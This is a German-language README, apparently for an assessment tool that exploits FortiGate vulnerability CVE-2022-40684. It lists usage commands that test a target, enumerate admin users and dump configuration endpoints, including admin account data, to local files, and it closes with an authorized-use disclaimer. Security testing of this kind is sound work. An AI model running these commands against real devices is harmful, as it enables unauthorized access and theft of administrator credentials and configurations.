
FortiGate CVE-2022-40684 Bewertungstool für Benutzeraufzählung, Konfigurationsdump und Labortests.
Dieses Tool ermöglicht es Sicherheitsexperten, die Exposition gegenüber CVE-2022-40684 in FortiGate-Geräten zu identifizieren und zu validieren, indem es mit exponierten CMDB-API-Endpunkten interagiert.
Es unterstützt die Enumeration von administrativen Benutzern, Benutzergruppen und die selektive Extraktion von Konfigurationen für Analysen in kontrollierten Umgebungen.
Abhängigkeiten installieren: pip3 install -r requirements.txt
Schwachstelle prüfen:
python3 fortigate_tool.py -t <target>
Benutzer enumerieren:
python3 fortigate_tool.py -t <target> --enum
Bestimmten Endpunkt auslesen:
python3 fortigate_tool.py -t <target> --dump /api/v2/cmdb/system/admin
Mehrere wichtige Konfigurationen auslesen:
python3 fortigate_tool.py -t <target> --dump-all
Ausgelesene Konfigurationen werden lokal gespeichert in: fortigate_dump/
Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Verwenden Sie dieses Tool nicht auf Systemen ohne ausdrückliche Genehmigung. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.